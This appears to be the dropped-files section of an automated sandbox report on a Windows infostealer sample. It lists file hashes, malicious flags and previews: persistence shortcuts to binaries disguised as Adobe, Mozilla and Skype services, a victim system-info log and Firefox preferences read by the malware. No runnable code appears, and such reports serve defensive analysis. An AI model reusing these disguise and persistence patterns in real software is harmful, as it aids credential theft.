                                                                                                                                                                                                                                SSDEEP:6:pYcCFWvLT4BjJfpvXJwkn23f3pdTegLzR+cYu0yFhdqSY7NuX0QN5TOjsQwA67X:pYzZfpfafTTeo4cYVmdy7NuhNNOsA6r
                                                                                                                                                                                                                                MD5:5442C5F2A157BC0DDBCA16EB96596247
                                                                                                                                                                                                                                SHA1:45C54D49C04C5992243989FA950A3A37401C2C0F
                                                                                                                                                                                                                                SHA-256:5C88A2C05A0970ACC733FB4E756AFAA5E365C8B53D44CBDD8955ADDE1F148D01
                                                                                                                                                                                                                                SHA-512:E5938D3B97207CEE8C0CCACF5919A4E890F7F59ADFCAEDE158C62F58B226FC92DE715CA1C51E46F0148C662D54FED278E5C11C4E5651D55273D88266023630AF
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview: ==================================================. Operating system : Windows 10 Pro (64 Bit). PC user : 134349/user. ClipBoard : . Launch : C:\Users\user\AppData\Local\Temp\jqnnpe.exe. ==================================================. Screen resolution : 1280x1024. Current time : 07/07/2024 05:12:10. HWID : 3408D440A4. ==================================================. CPU : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz. RAM : 4094MB. GPU : 1BUBDD. ==================================================. IP Geolocation : 8.46.123.33 [United States]. Log Date : 07/06/2024 7:28. BSSID : 00:50:56:a7:21:15. ==================================================
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\jqnnpe.exe
                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                Size (bytes):14845
                                                                                                                                                                                                                                Entropy (8bit):5.560360583279939
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:48:ONyCvnyCcyCiyC8yCcyCcyCcyCcyCt9yC/MzyCS0MKyCv1yCcyCzyCbbcJtyCtFo:OtORMbMw8w9qepueO7BDM7MvyUMOMo
                                                                                                                                                                                                                                MD5:C41423268E68178AA63D3BA4FACE241A
                                                                                                                                                                                                                                SHA1:96C50B1CE4B02DDAF9EE1154D879B29536C28DD1
                                                                                                                                                                                                                                SHA-256:36BF8AD326C0D13C4806F60101BB85F630E917E1AD038F554C361E2DE55C5514
                                                                                                                                                                                                                                SHA-512:B52878971D0F1BDD7600AB5EDCEF23344E01FDEF9DD99283403492A8E1441E035CF7D77C17C3ABD8F23AD44E94585A4438FC9294BD849E26B1D48D84B52C9378
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:NAME: svchost.EXE: ..NAME: explorer.EXE: C:\Windows\Explorer.EXE..NAME: conhost.EXE: ..NAME: QhDWCkhNozKoaiqNEYjOpjCAnG.EXE: C:\Program Files (x86)\WnbvwnyLEIpMIksLgGexpglTXwVvircFiDcjndWbYjZBEwZBEr\QhDWCkhNozKoaiqNEYjOpjCAnG.exe..NAME: dllhost.EXE: C:\Windows\system32\DllHost.exe..NAME: QhDWCkhNozKoaiqNEYjOpjCAnG.EXE: C:\Program Files (x86)\WnbvwnyLEIpMIksLgGexpglTXwVvircFiDcjndWbYjZBEwZBEr\QhDWCkhNozKoaiqNEYjOpjCAnG.exe..NAME: QhDWCkhNozKoaiqNEYjOpjCAnG.EXE: C:\Program Files (x86)\WnbvwnyLEIpMIksLgGexpglTXwVvircFiDcjndWbYjZBEwZBEr\QhDWCkhNozKoaiqNEYjOpjCAnG.exe..NAME: fontdrvhost.EXE: ..NAME: smartscreen.EXE: C:\Windows\System32\smartscreen.exe..NAME: svchost.EXE: ..NAME: svchost.EXE: ..NAME: csrss.EXE: ..NAME: QhDWCkhNozKoaiqNEYjOpjCAnG.EXE: C:\Program Files (x86)\WnbvwnyLEIpMIksLgGexpglTXwVvircFiDcjndWbYjZBEwZBEr\QhDWCkhNozKoaiqNEYjOpjCAnG.exe..NAME: svchost.EXE: ..NAME: sihost.EXE: C:\Windows\system32\sihost.exe..NAME: QhDWCkhNozKoaiqNEYjOpjCAnG.EXE: C:\Program Files (x86)\Wnbvwny
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\jqnnpe.exe
                                                                                                                                                                                                                                File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):599446
                                                                                                                                                                                                                                Entropy (8bit):7.9423959623734
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12288:NQXRS5TgTxOrUcvYrSnYqv4Jsduat3HFCN4aWVsVk1B7oT2ChXXxypbieybi9TAr:NQXR/OLKSYqrb3kSXmOBU6MXXxypKie
                                                                                                                                                                                                                                MD5:4735694A94648D95484B38E9BB6ACB9E
                                                                                                                                                                                                                                SHA1:3E42757DDD80B824BD711FA914EC5051E06BC2C6
                                                                                                                                                                                                                                SHA-256:9BC864C03FC1F9D92FC6201D16A9F2C53BBAC5EAA6CFAC3C43103EC9C8693F7B
                                                                                                                                                                                                                                SHA-512:722CD771F86F35C8E9CF6F3A8404FFA6E25CEA1654A3DB8187232BE275D952B775129F0DAD3ED4B480BD4A304125DAF96CA18E522ECE7EB208B0DEA737BDC1BE
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.........n.d.u....^.s.}..6f....d.1f6 ..B.1.......@Hh.1.....OVd........xVfFDF.....]........p.8r\z.....1zE.a..Y..h?.^.s7..1./....x...L_.B...E..CYzq>F/~>.K/.`V..+.)Y.G..{.......<w5.-..,=;.W..3s...k..........lY.."..8%....gc......>...r..d:.6+...\......r.._%?...,O.._..........C..0.r.z.......eY.5>_..l3.s..$..=.g.....\..9k....f...........R.{.5.70.6= ...1/,.......5Xy@......}...&....${...}.+..9.,.....9..{q.L...I.....0n....).5...@."&`....|.n.ih~W..<.c+.s...+s_.{`../...o...#X.y"d...8.q\.6..@.z/kV..6a......[F...s....+h....../.u\Y...Q....u....v.'`..u....."g.6......b\.K. .=....Io.s...z]...k...1...~..5...yTc...p-...r..6V.+..^..=.#...._.%9.#...}lE..E....S.w...O.,..N.k`...>...u.Go.5.q.|.....Y.X.,.qT.[....e.F?..z...!9a...+[%.=.[.]~.U.9..a.=@c....~.o.&?...5=...|OP\......e...^.k..o.Sz.>.)z...'....M..#2._r...9..=e.bR.".?.iF....f..t..I...[...Q.......:...1.!.;.........Z.......
                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\xj40xovMsm.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):225310
                                                                                                                                                                                                                                Entropy (8bit):6.053295654393721
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:9dLsQRGcDtk5k5/XRyGaTzSZ/GPBlQTUdAaPQ:DIQRG6Y4ziBl4Udq
                                                                                                                                                                                                                                MD5:A4623D0552D87941FBEFBE7133262D15
                                                                                                                                                                                                                                SHA1:74080A949DA104FDAB34E2A9350B924E07C08C14
                                                                                                                                                                                                                                SHA-256:8DAF5BFAEE59EBA951550F401BD22D52A08132F965E4D1D1944E17F076D2913E
                                                                                                                                                                                                                                SHA-512:4B1D56A125358998666E10AF6E6A26F7F24569B05AD501BD3C51A9E80C3F99712E82C4CAF303B78301F4AB5EE13EF78F5FE532347A2A54A5EE0515A9C7798E87
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:..T..T..T..U...T.&...T.&...T.D....T..c....T..c....T..c...T..`...T..`...T....T..`...T.Rich.T.................PE..d......f.........."......J...~.................@..........................................`..................................................:..........................................................................p............`...............................text....I.......J.................. ..`.rdata.......`.......N..............@..@.data....N...P...&...<..............@....pdata...............b..............@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\xj40xovMsm.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):225310
                                                                                                                                                                                                                                Entropy (8bit):6.053295654393721
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:9dLsQRGcDtk5k5/XRyGaTzSZ/GPBlQTUdAaPQ:DIQRG6Y4ziBl4Udq
                                                                                                                                                                                                                                MD5:A4623D0552D87941FBEFBE7133262D15
                                                                                                                                                                                                                                SHA1:74080A949DA104FDAB34E2A9350B924E07C08C14
                                                                                                                                                                                                                                SHA-256:8DAF5BFAEE59EBA951550F401BD22D52A08132F965E4D1D1944E17F076D2913E
                                                                                                                                                                                                                                SHA-512:4B1D56A125358998666E10AF6E6A26F7F24569B05AD501BD3C51A9E80C3F99712E82C4CAF303B78301F4AB5EE13EF78F5FE532347A2A54A5EE0515A9C7798E87
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:..T..T..T..U...T.&...T.&...T.D....T..c....T..c....T..c...T..`...T..`...T....T..`...T.Rich.T.................PE..d......f.........."......J...~.................@..........................................`..................................................:..........................................................................p............`...............................text....I.......J.................. ..`.rdata.......`.......N..............@..@.data....N...P...&...<..............@....pdata...............b..............@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\xj40xovMsm.exe
                                                                                                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Archive, ctime=Sat Jul 6 10:26:58 2024, mtime=Sat Jul 6 10:26:58 2024, atime=Sat Jul 6 10:26:58 2024, length=225310, window=hide
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):914
                                                                                                                                                                                                                                Entropy (8bit):4.998931674533475
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:8ij6+R4164pPWCvdY//HQj0LkVX6KrU1gtE522VAjAo2rHw3bPBmV:8b+RiHpeM+/Qi32U1Oi2wUAhMPBm
                                                                                                                                                                                                                                MD5:D5D396F5B3FB433389388AF166477ECE
                                                                                                                                                                                                                                SHA1:81A6F76EF0B12CD663D5086B1C281372F9EE7894
                                                                                                                                                                                                                                SHA-256:298C771FBA496493B3613891256D1A95E24E2EF6B06CE6C21694172D0ED64CE5
                                                                                                                                                                                                                                SHA-512:3D58623E9371BD7CAB85E39C57AD3C9B4E00F2AE6AE149CD1BEE4868D4B7593F7767177FEEC1FC2E259CAA5EAF960DA8166D69872E4C03DDE910CED79D798FB7
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:L..................F.... ......j.......j....*D.j.....p........................:..DG..Yr?.D..U..k0.&...&......vk.v.......d....?k.j........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.X[[...........................%..A.p.p.D.a.t.a...B.V.1......XY[..Roaming.@......CW.^.XY[..............................R.o.a.m.i.n.g.....P.1.....CWT^..Adobe.<......CW.^CWT^..........................G...A.d.o.b.e.....p.2..p...X`[ .SERVIC~1.EXE..T.......X`[.X`[....V........................S.e.r.v.i.c.e._.A.d.o.b.e...e.x.e.......e...............-.......d...........w..|.....C:\Users\user\AppData\Roaming\Adobe\Service_Adobe.exe....W.i.n.S.e.r.v.e.r.&.....\.....\.....\.....\.....\.A.d.o.b.e.\.S.e.r.v.i.c.e._.A.d.o.b.e...e.x.e.`.......X.......134349...........hT..CrF.f4... .|~T..b...,.......hT..CrF.f4... .|~T..b...,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\xj40xovMsm.exe
                                                                                                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Archive, ctime=Sat Jul 6 10:26:58 2024, mtime=Sat Jul 6 10:26:58 2024, atime=Sat Jul 6 10:26:58 2024, length=225310, window=hide
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):932
                                                                                                                                                                                                                                Entropy (8bit):5.0323765262793385
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:8iJL4s4pPWCvdY//HQj0LwzTQljf1g5z02KhjEjAJrHSu/HrKKDbkLEBmV:8eLUpeM+/Qihf120jUAJmuvrtHBm
                                                                                                                                                                                                                                MD5:C31DBAD319C227E3BBCE95311D97361F
                                                                                                                                                                                                                                SHA1:EA9AD7F609A1BA2872E43B394089A0BD5502368A
                                                                                                                                                                                                                                SHA-256:7EC5EA37199A531BFE84F59DC3C78AE6447E904A45AF195A1BD911E4CAC74419
                                                                                                                                                                                                                                SHA-512:3F4973296B26103667AA589255778398EE82B3489968F898A9F15F8F44B8E6CE471CEA34471DABCE465A84ADE82C74ECF6E26639DA14077A23389E9489586CC8
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:L..................F.... .....5j......5j....*D.j.....p........................:..DG..Yr?.D..U..k0.&...&......vk.v.......d....?k.j........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.X[[...........................%..A.p.p.D.a.t.a...B.V.1......XY[..Roaming.@......CW.^.XY[..............................R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^.X][..........................9D..M.i.c.r.o.s.o.f.t.....x.2..p...X`[ .SERVIC~1.EXE..\.......X`[.X`[............................S.e.r.v.i.c.e._.M.i.c.r.o.s.o.f.t...e.x.e.......m...............-.......l...........w..|.....C:\Users\user\AppData\Roaming\Microsoft\Service_Microsoft.exe....W.i.n.S.e.r.v.e.r.!.....\.....\.....\.....\.S.e.r.v.i.c.e._.M.i.c.r.o.s.o.f.t...e.x.e.`.......X.......134349...........hT..CrF.f4... .~T..b...,.......hT..CrF.f4... .~T..b...,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\xj40xovMsm.exe
                                                                                                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Archive, ctime=Sat Jul 6 10:26:59 2024, mtime=Sat Jul 6 10:26:59 2024, atime=Sat Jul 6 10:26:58 2024, length=225310, window=hide
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):936
                                                                                                                                                                                                                                Entropy (8bit):4.998789832988957
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:8ifpWC4e4pPWCvdY//HQj0Le/R1E1gJb2HiAjAlrH0HGTH2bgPEBmV:8i6peM+/QiepO1ibQAl8gPEBm
                                                                                                                                                                                                                                MD5:C764F861003BAEF153D99AAAFCF33747
                                                                                                                                                                                                                                SHA1:DDCFC857B08588E962972E86FA89BBF562062148
                                                                                                                                                                                                                                SHA-256:2D4E73D947C2F123118D67C7D8DDEB80EC33EC2118AFBAA78C0EA1A532AFAE48
                                                                                                                                                                                                                                SHA-512:1E9BACB5BD8E84B9CE22F898821202348917C92FE0460506F9022A20D53B89DE8BDECAD5B5B8C1398A20286B0A9E0300CFAE0BD8C8ECF961888F0F28B1A3AD43
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:L..................F.... ....UFj.....UFj....*D.j.....p........................:..DG..Yr?.D..U..k0.&...&......vk.v.......d....?k.j........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.X[[...........................%..A.p.p.D.a.t.a...B.V.1......XY[..Roaming.@......CW.^.XY[..............................R.o.a.m.i.n.g.....V.1.....CWN^..Mozilla.@......CWN^CWN^....2.....................or#.M.o.z.i.l.l.a.....t.2..p...X`[ .SERVIC~1.EXE..X.......X`[.X`[............................S.e.r.v.i.c.e._.M.o.z.i.l.l.a...e.x.e.......i...............-.......h...........w..|.....C:\Users\user\AppData\Roaming\Mozilla\Service_Mozilla.exe....W.i.n.S.e.r.v.e.r.*.....\.....\.....\.....\.....\.M.o.z.i.l.l.a.\.S.e.r.v.i.c.e._.M.o.z.i.l.l.a...e.x.e.`.......X.......134349...........hT..CrF.f4... .~T..b...,.......hT..CrF.f4... .~T..b...,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\xj40xovMsm.exe
                                                                                                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Archive, ctime=Sat Jul 6 10:26:59 2024, mtime=Sat Jul 6 10:26:59 2024, atime=Sat Jul 6 10:26:58 2024, length=225310, window=hide
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):914
                                                                                                                                                                                                                                Entropy (8bit):4.973121735788259
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:8igKX4164pPWCvdY//HQj0Lk6C3JU1gtG/42NEAjAo2rHQRnKNEbvBmV:8OiHpeM+/QirCZU1OGwTUAhYnFvBm
                                                                                                                                                                                                                                MD5:4E4066B81C9DE600ED22598E162EA5FD
                                                                                                                                                                                                                                SHA1:97AB8AC7C97FDCDD0387F36BD4D91ED870EC6F9B
                                                                                                                                                                                                                                SHA-256:F499A4C51FDFFFC2AB787D25955DE781E7C9148DB7AD243D6B68B4721A86204D
                                                                                                                                                                                                                                SHA-512:A1D6B735A247F65135E4C980E10DD754A0986E9716E1C02515D20E17A638D9D87E5579AA159E8FF35FC14FCAA48B005A1CA416A0D31A29E71B9C7E9E82D84579
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:L..................F.... ....Hj.....Hj....*D.j.....p........................:..DG..Yr?.D..U..k0.&...&......vk.v.......d....?k.j........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.X[[...........................%..A.p.p.D.a.t.a...B.V.1......XY[..Roaming.@......CW.^.XY[..............................R.o.a.m.i.n.g.....P.1.....DW.D..Skype.<......DW.DDW.D....(......................J6.S.k.y.p.e.....p.2..p...X`[ .SERVIC~1.EXE..T.......X`[.X`[....;........................S.e.r.v.i.c.e._.S.k.y.p.e...e.x.e.......e...............-.......d...........w..|.....C:\Users\user\AppData\Roaming\Skype\Service_Skype.exe....W.i.n.S.e.r.v.e.r.&.....\.....\.....\.....\.....\.S.k.y.p.e.\.S.e.r.v.i.c.e._.S.k.y.p.e...e.x.e.`.......X.......134349...........hT..CrF.f4... .~T..b...,.......hT..CrF.f4... .~T..b...,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\xj40xovMsm.exe
                                                                                                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Archive, ctime=Sat Jul 6 10:26:58 2024, mtime=Sat Jul 6 10:26:58 2024, atime=Sat Jul 6 10:26:58 2024, length=225310, window=hide
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1042
                                                                                                                                                                                                                                Entropy (8bit):4.971332837195575
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:86tpeM+/QivsuDrsU1mvc3DrgUA5NyBDrcDrSvBm:86tpeLQivsTvrjXO
                                                                                                                                                                                                                                MD5:40CD8028E43C4A8E5E88E91109809D8A
                                                                                                                                                                                                                                SHA1:63D6E2B543C2F4BB5AD24B744120806E4BBBF989
                                                                                                                                                                                                                                SHA-256:08A26AECA90EEEC27312156117FBCDEA7331501853F20A97533ACFE3A3DEBE6D
                                                                                                                                                                                                                                SHA-512:79FC95A95067E4FB9426F7472658080B07550CE528A5114DB34AC46338401B51C89EFAECBBA955DB20B8F42BE1742E5694ED9887ED328139843BD34BD4055C25
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:L..................F.... .....,j......,j....*D.j.....p........................:..DG..Yr?.D..U..k0.&...&......vk.v.......d....?k.j........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.X[[...........................%..A.p.p.D.a.t.a...B.V.1......XY[..Roaming.@......CW.^.XY[..............................R.o.a.m.i.n.g.....p.1.....CWT^..COMADO~1.DUN..T......CWT^CWT^..........................G...c.o.m...a.d.o.b.e...d.u.n.a.m.i.s.......2..p...X`[ .SERVIC~1.EXE..l.......X`[.X`[....U........................S.e.r.v.i.c.e._.c.o.m...a.d.o.b.e...d.u.n.a.m.i.s...e.x.e.......}...............-.......|...........w..|.....C:\Users\user\AppData\Roaming\com.adobe.dunamis\Service_com.adobe.dunamis.exe....W.i.n.S.e.r.v.e.r.>.....\.....\.....\.....\.....\.c.o.m...a.d.o.b.e...d.u.n.a.m.i.s.\.S.e.r.v.i.c.e._.c.o.m...a.d.o.b.e...d.u.n.a.m.i.s...e.x.e.`.......X.......134349...........hT..CrF.f4... .~T..b...,.......hT..CrF.f4... .~T..b...,......E.......9...1SPS..mD..pH.H@..=x
                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\xj40xovMsm.exe
                                                                                                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Archive, ctime=Sat Jul 6 10:28:10 2024, mtime=Sat Jul 6 10:28:10 2024, atime=Sat Jul 6 10:28:10 2024, length=238080, window=hide
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1108
                                                                                                                                                                                                                                Entropy (8bit):4.991670111315793
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:8a+Z/CM+shCr9ui1Jm3C7uWAP0tsuEuVxEyBm:8a+ZawhG88vKNCH/X
                                                                                                                                                                                                                                MD5:0D86D5CACEE791043121089BB92E7E34
                                                                                                                                                                                                                                SHA1:3D86AC106AFD56F1955A1E24B43B6051204D028B
                                                                                                                                                                                                                                SHA-256:C9E81E057F9F2BA3630CF5F3BB2163B5A5DC2AC0EEA9FCE6E6203AC2A96A7EEE
                                                                                                                                                                                                                                SHA-512:C17C972BDDAC51612E8BC6347294AF928F96D5CFFC2ED054AE0390C6D0FEFA1CC5B3F791396134CEEC31C547CBB43F080DEAB87233ABF451A6E422478405ABE2
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:L..................F.... ...1.......1.......`'..............................$.:..DG..Yr?.D..U..k0.&...&......vk.v.......d...............t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.X[[...........................%..A.p.p.D.a.t.a...B.V.1......Xp[..Roaming.@......CW.^.Xt[...........................%K.R.o.a.m.i.n.g.....z.1......X`[..{B955B~1..b.......X`[.Xz[....n.......................[.{.B.9.5.5.B.2.C.C.0.7.A.0.1.5.4.6.0.8.6.6.0.3.}.......2......X.[ .SERVIC~1.EXE..z.......X.[.X.[............................0.S.e.r.v.i.c.e._.{.B.9.5.5.B.2.C.C.0.7.A.0.1.5.4.6.0.8.6.6.0.3.}...e.x.e.......................-...................w..|.....C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe....W.i.n.S.e.r.v.e.r.L.....\.....\.....\.....\.....\.{.B.9.5.5.B.2.C.C.0.7.A.0.1.5.4.6.0.8.6.6.0.3.}.\.S.e.r.v.i.c.e._.{.B.9.5.5.B.2.C.C.0.7.A.0.1.5.4.6.0.8.6.6.0.3.}...e.x.e.`.......X.......134349...........hT..CrF.f4... .c.V.;...,...
                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\xj40xovMsm.exe
                                                                                                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Hidden, Archive, ctime=Sat Jul 6 10:26:59 2024, mtime=Sat Jul 6 10:28:52 2024, atime=Sat Jul 6 10:28:10 2024, length=238080, window=hide
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1099
                                                                                                                                                                                                                                Entropy (8bit):5.030438381113966
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:8K3aM/L+RT/bSNa3QA9fYeq1iD7cHqyFm:8K3ahRLONaXtDSiDDyF
                                                                                                                                                                                                                                MD5:678ADDB4FD7E9509EE87CDE8A8ABC8E5
                                                                                                                                                                                                                                SHA1:D18490C54E6B6F86E1874B0678CFA052458070B2
                                                                                                                                                                                                                                SHA-256:F87208C70E3D6FBBB9A38D02EF2E16B1BC285B9920B1DD2922C83450E3C3CCF9
                                                                                                                                                                                                                                SHA-512:CB38A5B462CBE0AE0D361080BA5479297FE6428989D3CDFA08A78AD5E6946C7024DF599F2B6FEE2EA18C83EA4D14C4C4AE143F94C771D9D32E7973A191334158
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:L..................F...."...%.Kj..........`'................................:..DG..Yr?.D..U..k0.&...&......vk.v.......d....)p..........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.X[[...........................%..A.p.p.D.a.t.a...B.P.1......X.[..Local.<......CW.^.X.[....b.....................,I..L.o.c.a.l.....\.1......X`[..MICROS~1..D......CW.^.X`[.............................M.i.c.r.o.s.o.f.t.....b.2......X.[".psvhost.exe.H.......X`[.X.[....].......................0.p.s.v.h.o.s.t...e.x.e.......a...............-.......`...........w..|.....C:\Users\user\AppData\Local\Microsoft\psvhost.exe....O.n.e.D.r.i.v.e.-.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.p.s.v.h.o.s.t...e.x.e.............:...........|....I.J.H..K..:...`.......X.......134349...........hT..CrF.f4... .~T..b...,.......hT..CrF.f4... .~T..b...,..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.
                                                                                                                                                                                                                                Process:C:\Windows\System32\relog.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                Size (bytes):13741
                                                                                                                                                                                                                                Entropy (8bit):5.390835576331915
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJS35Bu/6D7HZdaWjFK/iQwo4YpPha5aN:yegqumcwQMB0AkAoN
                                                                                                                                                                                                                                MD5:F57A13DA364EBC03BC4D59C426F66F85
                                                                                                                                                                                                                                SHA1:3FFB5A050C0A11A4C7F6EECDF032DE0B606DB466
                                                                                                                                                                                                                                SHA-256:8C76DB6F5E11ACE023B049F6189E05C0459E3C001A630ACCC2A2B96C9666C88F
                                                                                                                                                                                                                                SHA-512:2D2B8721EBF1A26270ECE38A0B35531944E68FFA32118FF29BF3527861435FD1D36B5BE6ECC1712567B6A6759B443D89AB1370941B09B916E2160FED276FB9AE
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\xj40xovMsm.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):225310
                                                                                                                                                                                                                                Entropy (8bit):6.053295654393721
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:9dLsQRGcDtk5k5/XRyGaTzSZ/GPBlQTUdAaPQ:DIQRG6Y4ziBl4Udq
                                                                                                                                                                                                                                MD5:A4623D0552D87941FBEFBE7133262D15
                                                                                                                                                                                                                                SHA1:74080A949DA104FDAB34E2A9350B924E07C08C14
                                                                                                                                                                                                                                SHA-256:8DAF5BFAEE59EBA951550F401BD22D52A08132F965E4D1D1944E17F076D2913E
                                                                                                                                                                                                                                SHA-512:4B1D56A125358998666E10AF6E6A26F7F24569B05AD501BD3C51A9E80C3F99712E82C4CAF303B78301F4AB5EE13EF78F5FE532347A2A54A5EE0515A9C7798E87
                                                                                                                                                                                                                                Malicious:true
